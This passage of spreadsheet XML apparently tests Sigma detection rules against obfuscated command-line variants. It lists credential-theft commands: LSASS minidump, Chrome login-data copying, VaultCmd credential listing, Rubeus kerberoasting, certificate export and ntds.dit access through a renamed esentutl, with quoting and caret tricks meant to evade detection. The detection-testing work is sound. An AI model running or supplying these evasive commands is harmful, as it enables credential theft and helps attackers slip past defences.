          <t>powershell.exe -"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="44" t="n"/>
      <c r="J91" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B92" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C92" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D92" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E92" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F92" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G92" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H92" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I92" s="43" t="n"/>
      <c r="J92" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B93" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C93" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D93" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E93" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F93" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G93" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I93" s="43" t="n"/>
      <c r="J93" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K93" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B94" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C94" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D94" s="44" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E94" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Get-Process -Name lsass | Out-Minidump}</t>
        </is>
      </c>
      <c r="F94" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G94" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H94" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I94" s="43" t="n"/>
      <c r="J94" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K94" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B95" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C95" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D95" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E95" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="43" t="n"/>
      <c r="J95" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K95" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B96" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C96" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D96" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E96" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F96" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G96" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H96" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I96" s="43" t="n"/>
      <c r="J96" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K96" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B97" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C97" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D97" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E97" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F97" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G97" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H97" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I97" s="43" t="n"/>
      <c r="J97" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B98" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C98" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D98" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E98" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F98" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G98" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H98" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="43" t="n"/>
      <c r="J98" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K98" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B99" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C99" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D99" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E99" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F99" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G99" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H99" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="43" t="n"/>
      <c r="J99" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B100" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C100" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D100" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E100" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F100" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G100" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H100" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I100" s="43" t="n"/>
      <c r="J100" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B101" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_browser_data</t>
        </is>
      </c>
      <c r="C101" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing</t>
        </is>
      </c>
      <c r="D101" s="43" t="inlineStr">
        <is>
          <t>47147b5b-9e17-4d76-b8d2-7bac24c5ce1b</t>
        </is>
      </c>
      <c r="E101" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Set-Location "$env:LOCALAPPDATA\Google\Chrome"; Copy-Item ".\User Data\Default\Login Data" -Destination "C:\AtomicRedTeam\ExternalPayloads"}</t>
        </is>
      </c>
      <c r="F101" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G101" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H101" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="43" t="n"/>
      <c r="J101" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K101" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B102" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C102" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D102" s="43" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E102" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32\rundll32.exe" keymgr,#1</t>
        </is>
      </c>
      <c r="F102" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G102" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H102" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I102" s="43" t="n"/>
      <c r="J102" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K102" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B103" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vaultcmd_list_creds</t>
        </is>
      </c>
      <c r="C103" s="43" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd</t>
        </is>
      </c>
      <c r="D103" s="43" t="inlineStr">
        <is>
          <t>58f50261-c53b-4c88-bd12-1d71f12eda4c</t>
        </is>
      </c>
      <c r="E103" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32\VaultCmd.exe" -listcreds:"Web Credentials" /all</t>
        </is>
      </c>
      <c r="F103" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G103" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H103" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I103" s="43" t="n"/>
      <c r="J103" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K103" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B104" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vaultcmd_list_creds</t>
        </is>
      </c>
      <c r="C104" s="43" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd</t>
        </is>
      </c>
      <c r="D104" s="43" t="inlineStr">
        <is>
          <t>58f50261-c53b-4c88-bd12-1d71f12eda4c</t>
        </is>
      </c>
      <c r="E104" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32\VaultCmd.exe" "/list"creds:"Windows Credentials" /all</t>
        </is>
      </c>
      <c r="F104" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G104" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H104" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="43" t="n"/>
      <c r="J104" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K104" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="43" t="n"/>
      <c r="B105" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C105" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D105" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E105" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -Encoding Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F105" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G105" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H105" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="43" t="n"/>
      <c r="J105" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="43" t="n"/>
      <c r="B106" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C106" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D106" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E106" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -"Encoding" Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F106" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G106" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H106" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="43" t="n"/>
      <c r="J106" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="43" t="n"/>
      <c r="B107" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C107" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D107" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E107" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EnCOdinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="43" t="n"/>
      <c r="J107" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="43" t="n"/>
      <c r="B108" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C108" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D108" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E108" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -ENCoDInG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F108" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G108" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H108" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="43" t="n"/>
      <c r="J108" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K108" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="43" t="n"/>
      <c r="B109" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C109" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D109" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E109" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -encoDINg Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F109" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G109" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H109" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="43" t="n"/>
      <c r="J109" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K109" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B110" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C110" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D110" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E110" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe -p C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J110" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K110" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C111" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D111" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E111" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\dbtool.exe &amp;&amp; C:\temp\dbtool.exe /"p" C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I111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111" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B112" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C112" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D112" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E112" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\dbtool.exe &amp;&amp; C:\temp\dbtool.exe /P C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I112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112" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C113" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D113" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E113" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I113" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J113" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K113" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B114" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C114" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D114" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E114" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p"" C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J114" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B115" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C115" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D115" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E115" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe,/p,C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J115" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K115" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C116" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D116" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E116" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /p /d ntds.dit</t>
        </is>
      </c>
      <c r="F116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I116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116" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B117" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C117" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D117" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E117" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe -"p" /d ntds.dit</t>
        </is>
      </c>
      <c r="F117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H117" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I117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117" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K117" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B118" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C118" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D118" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E118" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /p /D ntds.dit</t>
        </is>
      </c>
      <c r="F118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I118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118" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K118" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B119" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C119" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D119" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E119" s="44" t="inlineStr">
